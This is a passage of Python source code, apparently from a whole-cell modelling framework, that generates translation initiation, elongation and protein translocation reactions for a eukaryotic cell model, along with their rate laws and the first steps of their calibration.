conc_model = model.distribution_init_concentrations.create(
species=ribo_bound_species,
units=unit_registry.parse_units('molecule'),
)
conc_model.id = conc_model.gen_id()
init_reaction = model.reactions.create(
submodel=self.submodel, id='translation_initiation_' + mrna_kb.id,
name='translation initiation of ' + mrna_kb.name,
reversible=False, comments='Set to irreversible to model only the net flux')
# Adding participants to LHS
# Include 2 GTP hydrolysis and 1 ATP hydrolysis at the initiation factors
# Include 1 ATP hydrolysis for the charging of tRNA-met (or other start amino acid)
init_reaction.participants.append(
ribosome_complex.species_coefficients.get_or_create(
coefficient=-1))
init_reaction.participants.append(
ribo_binding_site_species.species_coefficients.get_or_create(
coefficient=-1))
init_reaction.participants.append(first_aa.species.get_one(
compartment=translation_compartment).species_coefficients.get_or_create(
coefficient=-1))
init_reaction.participants.append(metabolites['h2o'][
translation_compartment.id].species_coefficients.get_or_create(coefficient=-5))
init_reaction.participants.append(metabolites['atp'][
translation_compartment.id].species_coefficients.get_or_create(coefficient=-2))
init_reaction.participants.append(metabolites['gtp'][
translation_compartment.id].species_coefficients.get_or_create(coefficient=-2))
# Adding participants to RHS
init_reaction.participants.append(
ribo_bound_species.species_coefficients.get_or_create(
coefficient=1))
init_reaction.participants.append(metabolites['h'][
translation_compartment.id].species_coefficients.get_or_create(coefficient=5))
init_reaction.participants.append(metabolites['amp'][
translation_compartment.id].species_coefficients.get_or_create(coefficient=1))
init_reaction.participants.append(metabolites['adp'][
translation_compartment.id].species_coefficients.get_or_create(coefficient=1))
init_reaction.participants.append(metabolites['gdp'][
translation_compartment.id].species_coefficients.get_or_create(coefficient=2))
init_reaction.participants.append(metabolites['pi'][
translation_compartment.id].species_coefficients.get_or_create(coefficient=5))
# Create elongation reaction
protein_model = model.species_types.get_one(id=mrna_kb.protein.id).species.get_or_create(
model=model, compartment=translation_compartment)
protein_model.id = protein_model.gen_id()
if not protein_model.distribution_init_concentration:
conc_model = model.distribution_init_concentrations.create(
species=protein_model,
mean=0.,
units=unit_registry.parse_units('molecule'),
comments='Created and set to zero because the protein is translated ' +\
'but not localized in this compartment'
)
conc_model.id = conc_model.gen_id()
el_reaction = model.reactions.get_or_create(
submodel=self.submodel, id='translation_elongation_' + mrna_kb.id,
name='translation elongation of ' + mrna_kb.name,
reversible=False, comments='Lumped reaction')
aa_content[amino_acid_id_conversion[gvar.protein_aa_usage[mrna_kb.protein.id]['start_aa']]] -= 1
# Adding participation of amino acids and other additional metabolites for forming selenocysteine
serine_no = 0
for aa_met, count in aa_content.items():
if count:
# To add selenocysteine, seryl-tRNA is formed and phosphorylated before reacting with selenophosphate
if aa_met == amino_acid_id_conversion['U']:
serine_no = count
serine_met = amino_acid_id_conversion['S']
serine_species = metabolites[serine_met][translation_compartment.id]
serine_coefficient = el_reaction.participants.get_one(
species=serine_species)
if serine_coefficient:
old_coef = serine_coefficient.coefficient
el_reaction.participants.remove(serine_coefficient)
el_reaction.participants.add(
serine_species.species_coefficients.get_or_create(
coefficient=old_coef - count))
else:
el_reaction.participants.append(
serine_species.species_coefficients.get_or_create(
coefficient=-count))
el_reaction.participants.append(metabolites['selnp'][
translation_compartment.id].species_coefficients.get_or_create(
coefficient=-count))
el_reaction.participants.append(metabolites['adp'][
translation_compartment.id].species_coefficients.get_or_create(
coefficient=count))
el_reaction.participants.append(metabolites['ppi'][
translation_compartment.id].species_coefficients.get_or_create(
coefficient=count))
else:
aa_species = metabolites[aa_met][translation_compartment.id]
aa_coefficient = el_reaction.participants.get_one(
species=aa_species)
if aa_coefficient:
old_coef = aa_coefficient.coefficient
el_reaction.participants.remove(aa_coefficient)
el_reaction.participants.add(
aa_species.species_coefficients.get_or_create(
coefficient=old_coef - count))
else:
el_reaction.participants.append(
aa_species.species_coefficients.get_or_create(
coefficient=-count))
# Adding general participants to LHS
# Include 1 ATP hydrolysis for each tRNA-aa charging
# Include 1 GTP hydrolysis for each peptide bond formation
# Include 1 GTP hydrolysis at termination
el_reaction.participants.append(ribo_bound_species.species_coefficients.get_or_create(
coefficient=-1))
el_reaction.participants.append(metabolites['gtp'][
translation_compartment.id].species_coefficients.get_or_create(
coefficient=-gvar.protein_aa_usage[mrna_kb.protein.id]['len']))
el_reaction.participants.append(metabolites['atp'][
translation_compartment.id].species_coefficients.get_or_create(
coefficient=-(gvar.protein_aa_usage[mrna_kb.protein.id]['len']- 1 + serine_no)))
el_reaction.participants.append(metabolites['h2o'][
translation_compartment.id].species_coefficients.get_or_create(
coefficient=-((gvar.protein_aa_usage[mrna_kb.protein.id]['len']-1)*2 + 1)))
# Adding general participants to RHS
el_reaction.participants.append(ribosome_complex.species_coefficients.get_or_create(
coefficient=1))
el_reaction.participants.append(ribo_binding_site_species.species_coefficients.get_or_create(
coefficient=1))
el_reaction.participants.append(protein_model.species_coefficients.get_or_create(
coefficient=1))
el_reaction.participants.append(metabolites['amp'][
translation_compartment.id].species_coefficients.get_or_create(
coefficient=gvar.protein_aa_usage[mrna_kb.protein.id]['len']-1))
el_reaction.participants.append(metabolites['gdp'][
translation_compartment.id].species_coefficients.get_or_create(
coefficient=gvar.protein_aa_usage[mrna_kb.protein.id]['len']))
el_reaction.participants.append(metabolites['pi'][
translation_compartment.id].species_coefficients.get_or_create(
coefficient=(gvar.protein_aa_usage[mrna_kb.protein.id]['len']-1)*3 + 1))
el_reaction.participants.append(metabolites['h'][
translation_compartment.id].species_coefficients.get_or_create(
coefficient=3*gvar.protein_aa_usage[mrna_kb.protein.id]['len'] - 2 - serine_no))
init_el_rxn_no += 1
# Create translocation reactions
all_localized_comp = [i.compartment for i in model.species_types.get_one(
id=mrna_kb.protein.id).species if i.compartment!=translation_compartment]
self._translocation_reactions[mrna_kb] = {}
for compartment in all_localized_comp:
trans_reaction = model.reactions.get_or_create(
submodel=self.submodel, id='translocation_{}_{}_to_{}'.format(
mrna_kb.protein.id, translation_compartment.id ,compartment.id),
name='translocation of {} from {} to {}'.format(
mrna_kb.protein.name, translation_compartment.name, compartment.name),
reversible=False, comments='Lumped reaction')
self._translocation_reactions[mrna_kb][compartment] = trans_reaction
if compartment.id=='n':
energy_compartment = nucleus # GTP-dependent translocation
energy_reactant = 'gtp'
energy_product = 'gdp'
elif compartment.id=='m':
energy_compartment = mitochondrion # ATP-dependent translocation
energy_reactant = 'atp'
energy_product = 'adp'
elif compartment.id=='x':
energy_compartment = peroxisome # ATP-dependent translocation
energy_reactant = 'atp'
energy_product = 'adp'
else:
energy_compartment = cytosol # GTP-dependent translocation to other organelles and membranes through er
energy_reactant = 'gtp'
energy_product = 'gdp'
# Adding participants to LHS
# Include ATP/GTP hydrolysis during (co-translational and post-translational) translocation
trans_reaction.participants.append(protein_model.species_coefficients.get_or_create(
coefficient=-1))
trans_reaction.participants.append(model.species_types.get_one(id=energy_reactant).species.get_one(
compartment = energy_compartment).species_coefficients.get_or_create(coefficient=-1))
trans_reaction.participants.append(model.species_types.get_one(id='h2o').species.get_one(
compartment = energy_compartment).species_coefficients.get_or_create(coefficient=-1))
# Adding participants to RHS
trans_reaction.participants.append(protein_model.species_type.species.get_one(
compartment=compartment).species_coefficients.get_or_create(coefficient=1))
trans_reaction.participants.append(model.species_types.get_one(id=energy_product).species.get_one(
compartment = energy_compartment).species_coefficients.get_or_create(coefficient=1))
trans_reaction.participants.append(model.species_types.get_one(id='pi').species.get_one(
compartment = energy_compartment).species_coefficients.get_or_create(coefficient=1))
trans_reaction.participants.append(model.species_types.get_one(id='h').species.get_one(
compartment = energy_compartment).species_coefficients.get_or_create(coefficient=1))
trans_rxn_no += 1
print('{} reactions each for initiation and elongation and {} reactions for protein translocation '
'have been generated'.format(init_el_rxn_no, trans_rxn_no))
def gen_rate_laws(self):
""" Generate rate laws for the reactions in the submodel """
model = self.model
cell = self.knowledge_base.cell
amino_acid_id_conversion = self.options.get('amino_acid_id_conversion')
beta = self.options.get('beta')
codon_table = self.options['codon_table']
cds = self.options['cds']
selenoproteome = self.options['selenoproteome']
cytoplasmic_ribosome = self.options.get('cytoplasmic_ribosome')
mitochondrial_ribosome = self.options.get('mitochondrial_ribosome')
cytoplasmic_initiation_factors = self.options.get('cytoplasmic_initiation_factors')
mitochondrial_initiation_factors = self.options.get('mitochondrial_initiation_factors')
cytoplasmic_elongation_factors = self.options.get('cytoplasmic_elongation_factors')
mitochondrial_elongation_factors = self.options.get('mitochondrial_elongation_factors')
cytoplasmic_chaperones = self.options.get('cytoplasmic_chaperones')
mitochondrial_chaperones = self.options.get('mitochondrial_chaperones')
er_chaperones = self.options.get('er_chaperones')
cytosol = model.compartments.get_one(id='c')
nucleus = model.compartments.get_one(id='n')
mitochondrion = model.compartments.get_one(id='m')
peroxisome = model.compartments.get_one(id='x')
er = model.compartments.get_one(id='r')
max_bool = model.parameters.get_or_create(
id='max_bool_substance',
type=None,
value=1,
units=unit_registry.parse_units('molecule'),
comments='Boolean switch for determining if binding site is still available'
)
min_bool = model.parameters.get_or_create(
id='min_bool_substance',
type=None,
value=0,
units=unit_registry.parse_units('molecule'),
comments='Boolean switch for determining if binding site is still available'
)
# Generate response function for the tRNA(s) of each codon and for each amino acid
trna_kb = cell.species_types.get(__type=wc_kb.eukaryote.TranscriptSpeciesType,
type=wc_kb.eukaryote.TranscriptType.tRna)
trna_grouping = {'c': {}, 'm': {}}
for trna in trna_kb:
anticodon_prop = trna.properties.get_one(property='anticodon:amino_acid').get_value().split(':')
codons = ANTICODON_CODON_RECOGNITION_RULES[anticodon_prop[0]]
for codon in codons:
if trna.species[0].compartment.id == 'm':
if codon in trna_grouping['m']:
trna_grouping['m'][codon]['trna'].append(trna.id)
trna_grouping['m'][codon]['anticodon'].append(anticodon_prop[0])
else:
trna_grouping['m'][codon] = {
'trna': [trna.id],
'anticodon': [anticodon_prop[0]],
'aa': anticodon_prop[1],
}
else:
if codon in trna_grouping['c']:
trna_grouping['c'][codon]['trna'].append(trna.id)
trna_grouping['c'][codon]['anticodon'].append(anticodon_prop[0])
else:
trna_grouping['c'][codon] = {
'trna': [trna.id],
'anticodon': [anticodon_prop[0]],
'aa': anticodon_prop[1],
}
trna_functions = {'c': {}, 'm': {}}
for comp, all_trnas in trna_grouping.items():
for codon, trnas in all_trnas.items():
compartment = mitochondrion if comp=='m' else cytosol
# Import cytosolic tRNAs if mitochondrial tRNAs are not detected
if comp=='m' and all(model.distribution_init_concentrations.get_one(
id='dist-init-conc-{}[m]'.format(i)).mean==0 for i in trnas['trna']):
trnas['trna'] += trna_grouping['c'][codon]['trna']
self._import_cytosolic_trna_into_mitochondria(trna_grouping['c'][codon]['trna'])
factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
model, beta, 'translation_{}'.format(compartment.id), 'translation_{}'.format(compartment.id),
compartment, [trnas['trna']])
objects = {
wc_lang.Species: all_species,
wc_lang.Parameter: all_parameters,
wc_lang.Observable: all_observables,
wc_lang.Function: all_volumes,
}
anticodons = '_'.join(sorted(set(trnas['anticodon'])))
trna_factor_function = model.functions.get_one(
id='trna_function_{}_{}'.format(anticodons, compartment.id))
if not trna_factor_function:
trna_expression, error = wc_lang.FunctionExpression.deserialize(factor_exp[0], objects)
assert error is None, str(error)
trna_factor_function = model.functions.create(
id='trna_function_{}_{}'.format(anticodons, compartment.id),
name='tRNA response function for anticodon(s) {} in {}'.format(
anticodons, compartment.name),
expression=trna_expression,
units=unit_registry.parse_units(''),
)
trna_functions[comp][codon] = {
'function': trna_factor_function,
'aa': trnas['aa'],
'objects':objects,
}
aa_functions = {'c': {}, 'm': {}}
for aa, aa_id in amino_acid_id_conversion.items():
if aa!='U':
for compartment in [cytosol, mitochondrion]:
factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
model, beta, 'translation_{}'.format(compartment.id), 'translation_{}'.format(compartment.id),
compartment, [[aa_id]])
objects = {
wc_lang.Species: all_species,
wc_lang.Parameter: all_parameters,
wc_lang.Observable: all_observables,
wc_lang.Function: all_volumes,
}
aa_expression, error = wc_lang.FunctionExpression.deserialize(factor_exp[0], objects)
assert error is None, str(error)
aa_functions[compartment.id][aa_id] = {
'function': model.functions.create(
id='aminoacid_function_{}_{}'.format(aa_id, compartment.id),
name='response function for amino acid {} in {}'.format(aa_id, compartment.name),
expression=aa_expression,
units=unit_registry.parse_units(''),
),
'objects': objects
}
# Generate response function for each translation initiation factor group
init_factor_functions = {'c': {}, 'm': {}}
for comp, factors in {cytosol: cytoplasmic_initiation_factors, mitochondrion: mitochondrial_initiation_factors}.items():
n = 1
for factor in factors:
factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
model, beta, 'translation_init_{}'.format(comp.id), 'translation_init_{}'.format(comp.id), comp, [factor])
objects = {
wc_lang.Species: all_species,
wc_lang.Parameter: all_parameters,
wc_lang.Observable: all_observables,
wc_lang.Function: all_volumes,
}
expression, error = wc_lang.FunctionExpression.deserialize(factor_exp[0], objects)
assert error is None, str(error)
init_factor_functions[comp.id][','.join(factor)] = {
'function': model.functions.create(
id='translation_init_factor_function_{}_{}'.format(comp.id, n),
name='response function for translation initiation factor {} in {}'.format(n, comp.name),
expression=expression,
units=unit_registry.parse_units(''),
),
'objects': objects}
n += 1
# Generate response function for each translation elongation factor group
el_factor_functions = {'c': {}, 'm': {}}
for comp, factors in {cytosol: cytoplasmic_elongation_factors, mitochondrion: mitochondrial_elongation_factors}.items():
n = 1
for factor in factors:
factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
model, beta, 'translation_el_{}'.format(comp.id), 'translation_el_{}'.format(comp.id), comp, [factor])
objects = {
wc_lang.Species: all_species,
wc_lang.Parameter: all_parameters,
wc_lang.Observable: all_observables,
wc_lang.Function: all_volumes,
}
expression, error = wc_lang.FunctionExpression.deserialize(factor_exp[0], objects)
assert error is None, str(error)
el_factor_functions[comp.id][','.join(factor)] = {
'function': model.functions.create(
id='translation_el_factor_function_{}_{}'.format(comp.id, n),
name='response function for translation elongation factor {} in {}'.format(n, comp.name),
expression=expression,
units=unit_registry.parse_units(''),
),
'objects': objects}
n += 1
# Generate response function for each translocation factor/chaperone group
trans_factor_functions = {'c': {}, 'm': {}, 'r': {}}
for comp, factors in {cytosol: cytoplasmic_chaperones, mitochondrion: mitochondrial_chaperones, er: er_chaperones}.items():
n = 1
for factor in factors:
factor_exp, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
model, beta, 'translocation_{}'.format(comp.id), 'translocation_{}'.format(comp.id), comp, [factor])
objects = {
wc_lang.Species: all_species,
wc_lang.Parameter: all_parameters,
wc_lang.Observable: all_observables,
wc_lang.Function: all_volumes,
}
expression, error = wc_lang.FunctionExpression.deserialize(factor_exp[0], objects)
assert error is None, str(error)
trans_factor_functions[comp.id][','.join(factor)] = {
'function': model.functions.create(
id='translocation_factor_function_{}_{}'.format(comp.id, n),
name='response function for translocation factor {} in {}'.format(n, comp.name),
expression=expression,
units=unit_registry.parse_units(''),
),
'objects': objects}
n += 1
rate_law_no = 0
mrna_kbs = [i for i in cell.species_types.get(__type=wc_kb.eukaryote.TranscriptSpeciesType) \
if i.type==wc_kb.eukaryote.TranscriptType.mRna]
for mrna_kb in mrna_kbs:
mrna_kb_compartment_id = mrna_kb.species[0].compartment.id
if mrna_kb_compartment_id == 'c':
ribosome_complex = model.species_types.get_one(
name=cytoplasmic_ribosome).species.get_one(compartment=cytosol)
initiation_factors = cytoplasmic_initiation_factors
elongation_factors = cytoplasmic_elongation_factors
translation_compartment = cytosol
else:
ribosome_complex = model.species_types.get_one(
name=mitochondrial_ribosome).species.get_one(compartment=mitochondrion)
initiation_factors = mitochondrial_initiation_factors
elongation_factors = mitochondrial_elongation_factors
translation_compartment = mitochondrion
# Generate rate law for initiation
init_reaction = model.reactions.get_one(id='translation_initiation_' + mrna_kb.id)
specific_binding_constant = model.parameters.create(
id='{}_ribosome_binding_constant'.format(mrna_kb.id),
type=None,
units=unit_registry.parse_units('molecule^-2 s^-1'),
)
objects = {
wc_lang.Species: {},
wc_lang.Parameter: {},
wc_lang.Observable: {},
wc_lang.Function: {},
}
expression_terms = []
for factor in initiation_factors:
factor_details = init_factor_functions[translation_compartment.id][','.join(factor)]
expression_terms.append(factor_details['function'].id)
for cl, dictionary in objects.items():
dictionary.update(factor_details['objects'][cl])
objects[wc_lang.Function][factor_details['function'].id] = factor_details['function']
start_codon = gvar.protein_aa_usage[mrna_kb.protein.id]['start_codon'].replace('U', 'T')
start_aa_met = amino_acid_id_conversion[gvar.protein_aa_usage[mrna_kb.protein.id]['start_aa']]
matched_trnas = [trna_functions[translation_compartment.id][start_codon]]
for codon_info in matched_trnas:
expression_terms.append(codon_info['function'].id)
objects[wc_lang.Function][codon_info['function'].id] = codon_info['function']
for cl, dictionary in objects.items():
dictionary.update(codon_info['objects'][cl])
expression_terms.append(aa_functions[translation_compartment.id][
start_aa_met]['function'].id)
objects[wc_lang.Function][aa_functions[translation_compartment.id][
start_aa_met]['function'].id] = aa_functions[translation_compartment.id][
start_aa_met]['function']
for cl, dictionary in objects.items():
dictionary.update(aa_functions[translation_compartment.id][
start_aa_met]['objects'][cl])
objects[wc_lang.Species][ribosome_complex.id] = ribosome_complex
objects[wc_lang.Species][self._allowable_queue_len[mrna_kb.id][0].id]= self._allowable_queue_len[mrna_kb.id][0]
objects[wc_lang.Parameter][max_bool.id] = max_bool
objects[wc_lang.Parameter][min_bool.id] = min_bool
objects[wc_lang.Parameter][specific_binding_constant.id] = specific_binding_constant
expression = '{} * {} * max(min({} , {}) , {}) * {} * 2**{}'.format(
specific_binding_constant.id,
ribosome_complex.id,
self._allowable_queue_len[mrna_kb.id][0].id,
max_bool.id,
min_bool.id,
' * '.join(expression_terms),
len(expression_terms),
)
init_rate_law_expression, error = wc_lang.RateLawExpression.deserialize(expression, objects)
assert error is None, str(error)
init_rate_law = model.rate_laws.create(
direction=wc_lang.RateLawDirection.forward,
type=None,
expression=init_rate_law_expression,
reaction=init_reaction,
units=unit_registry.parse_units('s^-1'),
)
init_rate_law.id = init_rate_law.gen_id()
# Generate rate law for elongation and termination
elongation_reaction = model.reactions.get_one(id='translation_elongation_' + mrna_kb.id)
objects = {
wc_lang.Species: {},
wc_lang.Parameter: {},
wc_lang.Observable: {},
wc_lang.Function: {},
}
expression_terms = []
for factor in elongation_factors:
factor_details = el_factor_functions[translation_compartment.id][','.join(factor)]
expression_terms.append(factor_details['function'].id)
for cl, dictionary in objects.items():
dictionary.update(factor_details['objects'][cl])
objects[wc_lang.Function][factor_details['function'].id] = factor_details['function']
if codon_table == 1:
codon_id = 1
else:
codon_id = codon_table[mrna_kb.protein.id]
coding_rna_seq, _, _ = mrna_kb.protein.get_seq_and_start_codon(table=codon_id, cds=cds)
codon_seq = str(coding_rna_seq).upper().replace('U','T')
non_processed_all_codons = [codon_seq[i * 3:(i + 1) * 3] for i in range((len(codon_seq) + 3 - 1) // 3 )]
start_codon_index = 0
for codon in non_processed_all_codons:
if codon != start_codon:
start_codon_index += 1
else:
break
all_codons = sorted(set(non_processed_all_codons[start_codon_index + 1:]))
for i in all_codons:
if len(i)==3:
if i in UNCONDITIONAL_STOP_CODON:
pass
elif i in CONDITIONAL_STOP_CODON and mrna_kb.gene.id not in selenoproteome:
pass
else:
if translation_compartment.id == 'c':
matched_trnas = [trna_functions[translation_compartment.id][i]]
else:
if i in trna_functions[translation_compartment.id]:
matched_trnas = [trna_functions[translation_compartment.id][i]]
else:
cytosolic_trna_ids = trna_grouping['c'][i]['trna']
self._import_cytosolic_trna_into_mitochondria(cytosolic_trna_ids)
factor_exp, all_species, all_parameters, all_volumes, all_observables = \
utils.gen_response_functions(model, beta, 'translation_m', 'translation_m',
translation_compartment, [cytosolic_trna_ids])
added_objects = {
wc_lang.Species: all_species,
wc_lang.Parameter: all_parameters,
wc_lang.Observable: all_observables,
wc_lang.Function: all_volumes,
}
anticodons = '_'.join(sorted(set(trna_grouping['c'][i]['anticodon'])))
trna_factor_function = model.functions.get_one(
id='trna_function_{}_m'.format(anticodons))
if not trna_factor_function:
trna_expression, error = wc_lang.FunctionExpression.deserialize(
factor_exp[0], added_objects)
assert error is None, str(error)
trna_factor_function = model.functions.create(
id='trna_function_{}_m'.format(anticodons),
name='tRNA response function for anticodon(s) {} in {}'.format(
anticodons, translation_compartment.name),
expression=trna_expression,
units=unit_registry.parse_units(''),
)
trna_functions['m'][i] = {
'function': trna_factor_function,
'aa': trna_functions['c'][i]['aa'],
'objects': added_objects,
}
matched_trnas = [trna_functions[translation_compartment.id][i]]
for codon_info in matched_trnas:
expression_terms.append(codon_info['function'].id)
objects[wc_lang.Function][codon_info['function'].id] = codon_info['function']
for cl, dictionary in objects.items():
dictionary.update(codon_info['objects'][cl])
selcys = 0
for key, value in gvar.protein_aa_usage[mrna_kb.protein.id].items():
aa_id = 'S' if key=='U' else key
if aa_id in amino_acid_id_conversion and value:
selcys += 1 if key=='U' else 0
aa_met = amino_acid_id_conversion[aa_id]
if aa_met==start_aa_met and value-1==0:
pass
else:
if aa_functions[translation_compartment.id][aa_met][
'function'].id not in expression_terms:
expression_terms.append(aa_functions[translation_compartment.id][
aa_met]['function'].id)
objects[wc_lang.Function][aa_functions[translation_compartment.id][
aa_met]['function'].id] = aa_functions[translation_compartment.id][
aa_met]['function']
for cl, dictionary in objects.items():
dictionary.update(aa_functions[translation_compartment.id][
aa_met]['objects'][cl])
other_mets = [['gtp'], ['atp']] + ([['selnp']] if selcys else [])
expressions, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
model, beta, elongation_reaction.id, 'translation_elongation', translation_compartment, other_mets)
expression_terms += expressions
objects[wc_lang.Species].update(all_species)
objects[wc_lang.Parameter].update(all_parameters)
objects[wc_lang.Function].update(all_volumes)
objects[wc_lang.Observable].update(all_observables)
ribo_bound_species = model.species_types.get_one(id='ribo_bound_{}'.format(mrna_kb.id)).species[0]
objects[wc_lang.Species][ribo_bound_species.id] = ribo_bound_species
k_cat_elongation = model.parameters.create(
id='k_cat_{}'.format(elongation_reaction.id),
type=wc_ontology['WC:k_cat'],
units=unit_registry.parse_units('molecule^-1 s^-1'),
)
objects[wc_lang.Parameter][k_cat_elongation.id] = k_cat_elongation
expression = '{} * {} * {} * 2**{}'.format(
k_cat_elongation.id,
ribo_bound_species.id,
' * '.join(expression_terms),
len(expression_terms),
)
el_rate_law_expression, error = wc_lang.RateLawExpression.deserialize(expression, objects)
assert error is None, str(error)
el_rate_law = model.rate_laws.create(
direction=wc_lang.RateLawDirection.forward,
type=None,
expression=el_rate_law_expression,
reaction=elongation_reaction,
)
el_rate_law.id = el_rate_law.gen_id()
rate_law_no += 1
# Generate rate law for translocation
trans_rxn_no = 0
for reaction in self.submodel.reactions:
if 'translocation' in reaction.id:
translation_compartment = model.compartments.get_one(id=reaction.id.split('_')[2])
target_compartment_id = '_'.join(reaction.id.split('_')[4:])
if target_compartment_id=='n':
energy_compartment = nucleus
energy_reactant = 'gtp'
chaperones = []
elif target_compartment_id=='m':
energy_compartment = mitochondrion
energy_reactant = 'atp'
chaperones = mitochondrial_chaperones
chaperone_compartment = mitochondrion
elif target_compartment_id=='x':
energy_compartment = peroxisome
energy_reactant = 'atp'
chaperones = []
else:
energy_compartment = cytosol
energy_reactant = 'gtp'
chaperones = er_chaperones
chaperone_compartment = er
objects = {
wc_lang.Species: {},
wc_lang.Parameter: {},
wc_lang.Observable: {},
wc_lang.Function: {},
}
expression_terms = []
for factor in chaperones:
factor_details = trans_factor_functions[chaperone_compartment.id][','.join(factor)]
expression_terms.append(factor_details['function'].id)
for cl, dictionary in objects.items():
dictionary.update(factor_details['objects'][cl])
objects[wc_lang.Function][factor_details['function'].id] = factor_details['function']
expressions, all_species, all_parameters, all_volumes, all_observables = utils.gen_response_functions(
model, beta, reaction.id, 'translocation', energy_compartment, [[energy_reactant]])
expression_terms += expressions
objects[wc_lang.Species].update(all_species)
objects[wc_lang.Parameter].update(all_parameters)
objects[wc_lang.Function].update(all_volumes)
objects[wc_lang.Observable].update(all_observables)
k_cat_translocation = model.parameters.create(
id='k_cat_{}'.format(reaction.id),
type=wc_ontology['WC:k_cat'],
units=unit_registry.parse_units('molecule^-1 s^-1'),
)
objects[wc_lang.Parameter][k_cat_translocation.id] = k_cat_translocation
protein_species = model.species_types.get_one(
id=reaction.id.split('_')[1]).species.get_one(compartment=translation_compartment)
objects[wc_lang.Species][protein_species.id] = protein_species
volume = translation_compartment.init_density.function_expressions[0].function
objects[wc_lang.Function][volume.id] = volume
expression = '{} * {} * {} * 2**{}'.format(
k_cat_translocation.id,
protein_species.id,
' * '.join(expression_terms),
len(expression_terms),
)
trans_rate_law_expression, error = wc_lang.RateLawExpression.deserialize(expression, objects)
assert error is None, str(error)
trans_rate_law = model.rate_laws.create(
direction=wc_lang.RateLawDirection.forward,
type=None,
expression=trans_rate_law_expression,
reaction=reaction,
)
trans_rate_law.id = trans_rate_law.gen_id()
trans_rxn_no += 1
print('{} rate laws for initiation reactions, {} rate laws for elongation '
'reactions and {} rate laws for translocation reactions have been generated'.format(
rate_law_no, rate_law_no, trans_rxn_no))
def calibrate_submodel(self):
""" Calibrate the submodel using data in the KB """
model = self.model
cell = self.knowledge_base.cell
nucleus = model.compartments.get_one(id='n')
mitochondrion = model.compartments.get_one(id='m')
cytosol = model.compartments.get_one(id='c')
peroxisome = model.compartments.get_one(id='x')
er = model.compartments.get_one(id='r')
init_compartment_volumes = {
nucleus.id: nucleus.init_volume.mean * nucleus.init_density.value,
mitochondrion.id: mitochondrion.init_volume.mean * mitochondrion.init_density.value,
cytosol.id: cytosol.init_volume.mean * cytosol.init_density.value,
peroxisome.id: peroxisome.init_volume.mean * peroxisome.init_density.value,
er.id: er.init_volume.mean * er.init_density.value,
}
beta = self.options.get('beta')
polysome_fraction = self.options['polysome_fraction']
cytoplasmic_ribosome = self.options.get('cytoplasmic_ribosome')
mitochondrial_ribosome = self.options.get('mitochondrial_ribosome')
cytoplasmic_ribosome_species = model.species_types.get_one(
name=cytoplasmic_ribosome).species.get_one(compartment=cytosol)
mitochondrial_ribosome_species = model.species_types.get_one(
name=mitochondrial_ribosome).species.get_one(compartment=mitochondrion)
Avogadro = self.model.parameters.get_or_create(
id='Avogadro',
type=None,
value=scipy.constants.Avogadro,
units=unit_registry.parse_units('molecule mol^-1'))
mean_doubling_time = model.parameters.get_one(id='mean_doubling_time').value
mrna_kbs = [i for i in cell.species_types.get(__type=wc_kb.eukaryote.TranscriptSpeciesType) \
if i.type==wc_kb.eukaryote.TranscriptType.mRna]
# Determine initial concentrations of ribosome bound sites and update the concentrations of free ribosomes
cytoplasmic_bound_ribosomes = 0
mitochondrial_bound_ribosomes = 0
for mrna_kb in mrna_kbs:
mrna_kb_compartment_id = mrna_kb.species[0].compartment.id
if mrna_kb_compartment_id == 'c':
ribo_bound_conc = polysome_fraction[mrna_kb.id] * \
cytoplasmic_ribosome_species.distribution_init_concentration.mean
cytoplasmic_bound_ribosomes += ribo_bound_conc
else:
ribo_bound_conc = polysome_fraction[mrna_kb.id] * \
mitochondrial_ribosome_species.distribution_init_concentration.mean
mitochondrial_bound_ribosomes += ribo_bound_conc
ribo_bound_species = model.species_types.get_one(id='ribo_bound_{}'.format(
mrna_kb.id)).species[0]
ribo_bound_species.distribution_init_concentration.mean = ribo_bound_conc
cytoplasmic_ribosome_species.distribution_init_concentration.mean -= cytoplasmic_bound_ribosomes
mitochondrial_ribosome_species.distribution_init_concentration.mean -= mitochondrial_bound_ribosomes
# Calibrate initiation and elongation reactions
determined_init_kcat = []
undetermined_init_kcat = []
determined_el_kcat = []
undetermined_el_kcat = []
determined_transloc_kcat = []
undetermined_transloc_kcat = []
for mrna_kb in mrna_kbs:
mrna_kb_compartment_id = mrna_kb.species[0].compartment.id
ribosome_complex = cytoplasmic_ribosome_species if mrna_kb_compartment_id == 'c' else mitochondrial_ribosome_species
protein_model = model.species_types.get_one(id=mrna_kb.protein.id)
complex_model_stoic = {model.species_types.get_one(id=i.id):j.coefficient for i in cell.species_types.get(
__type=wc_kb.core.ComplexSpeciesType) for j in i.subunits if j.species_type==mrna_kb.protein}
total_concentration = sum([i.distribution_init_concentration.mean for i in protein_model.species]) + \
sum([i.distribution_init_concentration.mean*v for k,v in complex_model_stoic.items() for i in k.species \
if i.distribution_init_concentration])
half_life = mrna_kb.protein.properties.get_one(property='half-life').get_value()
average_rate = utils.calc_avg_syn_rate(
total_concentration, half_life, mean_doubling_time)
# Calibrate initiation reaction
init_reaction = model.reactions.get_one(id='translation_initiation_' + mrna_kb.id)
init_species_counts = {}
init_species_counts[ribosome_complex.id] = ribosome_complex.distribution_init_concentration.mean
init_species_counts[self._allowable_queue_len[mrna_kb.id][0].id] = self._allowable_queue_len[mrna_kb.id][1]
for species in init_reaction.rate_laws[0].expression.species:
init_species_counts[species.id] = species.distribution_init_concentration.mean
model_Km = model.parameters.get_one(
id='K_m_{}_{}'.format(init_reaction.id, species.species_type.id))
if model_Km:
if species.distribution_init_concentration.mean:
model_Km.value = beta * species.distribution_init_concentration.mean \
/ Avogadro.value / species.compartment.init_volume.mean
model_Km.comments = 'The value was assumed to be {} times the concentration of {} in {}'.format(
beta, species.species_type.id, species.compartment.name)
else:
model_Km.value = 1e-05
model_Km.comments = 'The value was assigned to 1e-05 because the concentration of ' +\
'{} in {} was zero'.format(species.species_type.id, species.compartment.name)
for func in init_reaction.rate_laws[0].expression.functions:
for species in func.expression.species:
init_species_counts[species.id] = species.distribution_init_concentration.mean
for obs in func.expression.observables:
for species in obs.expression.species:
init_species_counts[species.id] = species.distribution_init_concentration.mean
model_kcat = model.parameters.get_one(id='{}_ribosome_binding_constant'.format(mrna_kb.id))
if average_rate:
model_kcat.value = 1.
